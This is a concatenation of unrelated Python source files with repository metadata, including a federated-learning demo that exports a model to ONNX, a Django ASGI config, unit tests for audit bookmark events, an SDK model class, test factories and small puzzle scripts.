display('Worker_' + model_type + ' %s is running...' %user_name, logger, verbose)
wn.run()
display('Worker_' + model_type + ' %s: EXIT' %user_name, logger, verbose)
# Retrieving and saving the trained model
display('Retrieving the trained model from WorkerNode', logger, verbose)
model = wn.get_model()
# Warning: this save_model utility is only for demo purposes
output_filename_model = './results/models/Worker_' + str(user_name) + '_' + dataset_name + '_model'
model.save(output_filename_model)
# Making predictions on test data
display('------------- Obtaining predictions------------------------------------\n', logger, verbose)
preprocessors = wn.get_preprocessors()
if preprocessors is not None:
for prep_model in preprocessors: # Apply stored preprocessor sequentially (in the same order received)
Xtst = prep_model.transform(Xtst)
display('Test data transformed using %s' %prep_model.name, logger, verbose)
preds_tst = model.predict(Xtst)
preds_tst = np.argmax(preds_tst, axis=-1) # Labels
y = np.argmax(ytst, axis=-1) # Convert to labels
classes = np.arange(ytst.shape[1]) # 0 to 9
# Evaluating the results
display('------------- Evaluating --------------------------------------------\n', logger, verbose)
# Warning, these evaluation methods are not part of the MMLL library, they are only intended to be used for the demos. Use them at your own risk.
output_filename = 'Worker_' + str(user_name) + '_NN_confusion_matrix_' + dataset_name + '.png'
title = 'NN confusion matrix in test set worker'
plot_cm_seaborn(preds_tst, y, classes, title, output_filename, logger, verbose, normalize=True)
# Load Tf SavedModel and check results
model_loaded = tf.keras.models.load_model(output_filename_model)
preds_tst = model_loaded.predict(Xtst)
preds_tst = np.argmax(preds_tst, axis=-1) # Convert to labels
    # Model export to ONNX
output_filename_model = './results/models/Worker_' + str(user_name) + '_' + dataset_name + '_model.onnx'
model.save(output_filename_model)
# Compute the prediction with ONNX Runtime
onnx_session = onnxruntime.InferenceSession(output_filename_model)
onnx_inputs = {onnx_session.get_inputs()[0].name: Xtst}
onnx_output = onnx_session.run(None, onnx_inputs)[0]
onnx_output = np.argmax(onnx_output, axis=-1) # Convert to labels
err_onnx = np.mean((preds_tst.ravel() - onnx_output.ravel())**2)
display('Error in ONNX predictions is %f' %err_onnx, logger, verbose)
|
[
"rober.diaz@gmail.com"
] |
rober.diaz@gmail.com
|
f327656c3c6c957763b8883c4183d103b33e956c
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/verbs/_linking.py
|
619af3537e5435c213053702bea9f7364b783fca
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 228
|
py
|
from xai.brain.wordbase.verbs._link import _LINK
#calss header
class _LINKING(_LINK, ):
def __init__(self,):
_LINK.__init__(self)
self.name = "LINKING"
self.specie = 'verbs'
self.basic = "link"
self.jsondata = {}
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
e2e0a5e05ade4bf1b990a627802943af3a19626d
|
f5c7d50973d47abd555502470b300b3c70af9fa5
|
/voting/asgi.py
|
856ae28db6db7b31736db9f3585a818ef2de5cc0
|
[
"MIT"
] |
permissive
|
jess-monter/voting_back
|
62b67fafcfa8a9b7feebbca463c5055efdff7d98
|
de54218f01095f5090d490cabf32a86b1e608925
|
refs/heads/main
| 2023-04-06T16:00:45.066076
| 2021-04-14T07:51:10
| 2021-04-14T07:51:10
| 336,810,613
| 0
| 0
|
MIT
| 2021-04-14T07:51:11
| 2021-02-07T14:46:05
|
Python
|
UTF-8
|
Python
| false
| false
| 756
|
py
|
"""
ASGI config for voting project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "voting.settings")
django_asgi_app = get_asgi_application()
from channels.auth import AuthMiddlewareStack
from channels.routing import ProtocolTypeRouter, URLRouter
import voting.apps.notifications.routing
application = ProtocolTypeRouter(
{
"http": django_asgi_app,
"websocket": AuthMiddlewareStack(
URLRouter(voting.apps.notifications.routing.websocket_urlpatterns)
),
}
)
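# One common way to serve this application during development (assumes daphne,
# the Channels reference server, is installed):
#   daphne voting.asgi:application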
|
[
"="
] |
=
|
78430575c8a6091691a2baff513bfbe12212aa04
|
e8805bf7c79da1b63d36c3535b8f5ba7d97b6b56
|
/tests/test_auditor/test_auditor_bookmark.py
|
05eaeea64b067419856d25819c257ca50d667dd1
|
[
"MIT"
] |
permissive
|
wbuchwalter/polyaxon
|
9ad681e37065e8aa05741fb7d63b170e4c1fdfe6
|
a01396ea86a74082c457bfbc2c91d283b6ff6fba
|
refs/heads/master
| 2020-03-23T08:34:42.248328
| 2018-07-17T18:29:06
| 2018-07-17T18:29:06
| 141,334,939
| 0
| 0
|
MIT
| 2018-07-17T19:35:22
| 2018-07-17T19:35:21
| null |
UTF-8
|
Python
| false
| false
| 2,819
|
py
|
# pylint:disable=ungrouped-imports
from unittest.mock import patch
import pytest
import activitylogs
import auditor
import tracker
from event_manager.events import bookmark as bookmarks_events
from tests.utils import BaseTest
@pytest.mark.auditor_mark
class AuditorBookmarksTest(BaseTest):
"""Testing subscribed events"""
DISABLE_RUNNER = False
def setUp(self):
auditor.validate()
auditor.setup()
tracker.validate()
tracker.setup()
activitylogs.validate()
activitylogs.setup()
super().setUp()
@patch('tracker.service.TrackerService.record_event')
@patch('activitylogs.service.ActivityLogService.record_event')
def test_build_bookmarks_viewed(self, activitylogs_record, tracker_record):
auditor.record(event_type=bookmarks_events.BOOKMARK_BUILD_JOBS_VIEWED,
actor_id=1,
id=2)
assert tracker_record.call_count == 1
assert activitylogs_record.call_count == 1
@patch('tracker.service.TrackerService.record_event')
@patch('activitylogs.service.ActivityLogService.record_event')
def test_job_bookmarks_viewed(self, activitylogs_record, tracker_record):
auditor.record(event_type=bookmarks_events.BOOKMARK_JOBS_VIEWED,
actor_id=1,
id=1)
assert tracker_record.call_count == 1
assert activitylogs_record.call_count == 1
@patch('tracker.service.TrackerService.record_event')
@patch('activitylogs.service.ActivityLogService.record_event')
def test_experiment_bookmarks_viewed(self, activitylogs_record, tracker_record):
auditor.record(event_type=bookmarks_events.BOOKMARK_EXPERIMENTS_VIEWED,
actor_id=1,
id=2)
assert tracker_record.call_count == 1
assert activitylogs_record.call_count == 1
@patch('tracker.service.TrackerService.record_event')
@patch('activitylogs.service.ActivityLogService.record_event')
def test_experiment_group_bookmarks_viewed(self, activitylogs_record, tracker_record):
auditor.record(event_type=bookmarks_events.BOOKMARK_EXPERIMENT_GROUPS_VIEWED,
actor_id=1,
id=2)
assert tracker_record.call_count == 1
assert activitylogs_record.call_count == 1
@patch('tracker.service.TrackerService.record_event')
@patch('activitylogs.service.ActivityLogService.record_event')
def test_project_bookmarks_viewed(self, activitylogs_record, tracker_record):
auditor.record(event_type=bookmarks_events.BOOKMARK_PROJECTS_VIEWED,
actor_id=1,
id=1)
assert tracker_record.call_count == 1
assert activitylogs_record.call_count == 1
|
[
"mouradmourafiq@gmail.com"
] |
mouradmourafiq@gmail.com
|
c7d144b8335a423d324ebdc6e7a74ee5f11d99ad
|
665455c521cc7cf76c5436337ed545de90976af4
|
/cohesity_management_sdk/models/node_port.py
|
0160cdc36722ac0df6ecf9ed7e2a96895d226b7a
|
[
"Apache-2.0"
] |
permissive
|
hsantoyo2/management-sdk-python
|
d226273bc8eedcf9220ea4999a6f0b9a1a30d99c
|
0093194d125fc6746f55b8499da1270c64f473fc
|
refs/heads/master
| 2023-03-01T06:09:39.644085
| 2021-01-15T08:23:16
| 2021-01-15T08:23:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,851
|
py
|
# -*- coding: utf-8 -*-
# Copyright 2020 Cohesity Inc.
class NodePort(object):
"""Implementation of the 'NodePort' model.
    Specifies information of a NodePort per service and port
combination within an application instance.
Attributes:
is_ui_port (bool): TODO: type description here.
port (int): TODO: type description here.
tag (TagEnum): Specifies use of the nodeport kDefault - No specific
service. kHttp - HTTP server. kHttps - Secure HTTP server. kSsh -
Secure shell server.
"""
# Create a mapping from Model property names to API property names
_names = {
"is_ui_port":'isUiPort',
"port":'port',
"tag":'tag'
}
def __init__(self,
is_ui_port=None,
port=None,
tag=None):
"""Constructor for the NodePort class"""
# Initialize members of the class
self.is_ui_port = is_ui_port
self.port = port
self.tag = tag
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
is_ui_port = dictionary.get('isUiPort')
port = dictionary.get('port')
tag = dictionary.get('tag')
# Return an object of this model
return cls(is_ui_port,
port,
tag)
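# A small usage sketch of the deserialization helper above (the dictionary
# values are made up):
if __name__ == '__main__':
    payload = {'isUiPort': True, 'port': 30080, 'tag': 'kHttp'}
    node_port = NodePort.from_dictionary(payload)
    print(node_port.port, node_port.tag)  # 30080 kHttp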
|
[
"ashish@cohesity.com"
] |
ashish@cohesity.com
|
8cc261eb0ecfb093323305bc3cc656d8b5205b78
|
a6c13fb257563d99c45f79b2fee5c2f2f76251ef
|
/apps/common/factories.py
|
197597ddc5ded9aea5a8f9bfe7315a01f742e943
|
[] |
no_license
|
sipanmargaryan/addproduct
|
9999cdf9b611ea4f103ed9e58e24c8fc8fe0e3fb
|
9232c31956f154f3c4349fe3942a331559213c70
|
refs/heads/master
| 2022-11-05T19:23:37.209482
| 2020-06-26T14:44:45
| 2020-06-26T14:44:45
| 275,178,682
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 800
|
py
|
import factory
from django.utils import timezone
import common.models
class ArticleFactory(factory.DjangoModelFactory):
title = factory.Sequence(lambda n: 'help text title-{}'.format(n))
description = factory.Sequence(lambda n: 'help text description-{}'.format(n))
class Meta:
model = common.models.Article
class CategoryFactory(factory.DjangoModelFactory):
name = factory.Sequence(lambda n: 'category-{}'.format(n))
class Meta:
model = common.models.Category
class ServiceFactory(factory.DjangoModelFactory):
opening_time = factory.lazy_attribute(lambda x: timezone.now())
closing_time = factory.lazy_attribute(lambda x: timezone.now())
category = factory.SubFactory(CategoryFactory)
class Meta:
model = common.models.Service
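# A usage sketch, assuming a configured Django test context with database
# access (DjangoModelFactory persists instances under the default strategy):
#   article = ArticleFactory()    # title -> 'help text title-0', and so on
#   service = ServiceFactory()    # builds its Category via the SubFactory
#   assert service.category.name.startswith('category-')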
|
[
"sipanm19@gmail.com"
] |
sipanm19@gmail.com
|
d765931611ffb0b15f7c1c88acfd00e0ac6f9f19
|
15f321878face2af9317363c5f6de1e5ddd9b749
|
/solutions_python/Problem_145/669.py
|
bd702b9e219525f76c3fa85711b680bca73aa591
|
[] |
no_license
|
dr-dos-ok/Code_Jam_Webscraper
|
c06fd59870842664cd79c41eb460a09553e1c80a
|
26a35bf114a3aa30fc4c677ef069d95f41665cc0
|
refs/heads/master
| 2020-04-06T08:17:40.938460
| 2018-10-14T10:12:47
| 2018-10-14T10:12:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 688
|
py
|
#!/usr/bin/env python
import sys
import struct
import ctypes
def binary(num):
return ''.join(bin(ord(c)).replace('0b', '').rjust(8, '0') for c in struct.pack('!f', num))
T = int(sys.stdin.readline())
for case in range(0, T):
part = sys.stdin.readline()
up, down = part.split("/")
up = int(up)
down = int(down)
if int(bin(up&down)[2:]) != 0:
print "Case #%s: impossible" % (str(case+1) )
else:
for i in range(1, 40):
up = 2*up
if up >= down:
print "Case #%s: %d" % (str(case+1), i )
break
|
[
"miliar1732@gmail.com"
] |
miliar1732@gmail.com
|
559e9d1a9a1c37ba4f8aae45a6b1828a164fe7ce
|
b685036280331fa50fcd87f269521342ec1b437b
|
/src/tests/demo_5.py
|
c5de86e214fd5babcc1639e86f60c6ee47de9df4
|
[] |
no_license
|
chenqing666/myML_DM_Test
|
f875cb5b2a92e81bc3de2a0070c0185b7eacac89
|
5ac38f7872d94ca7cedd4f5057bb93732b5edbad
|
refs/heads/master
| 2022-02-26T01:52:06.293025
| 2019-09-20T06:35:25
| 2019-09-20T06:35:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 175
|
py
|
def fib(times):
n = 0
a,b = 0, 1
while n < times:
yield b
a, b = b, a + b
n += 1
return "done"
g = fib(2)
next(g)
next(g)
# next(g)
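# Draining a fresh generator, including the 'done' return value carried by
# StopIteration:
g2 = fib(3)
print(next(g2), next(g2), next(g2))  # 1 1 2
try:
    next(g2)
except StopIteration as e:
    print(e.value)  # done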
|
[
"976185561@qq.com"
] |
976185561@qq.com
|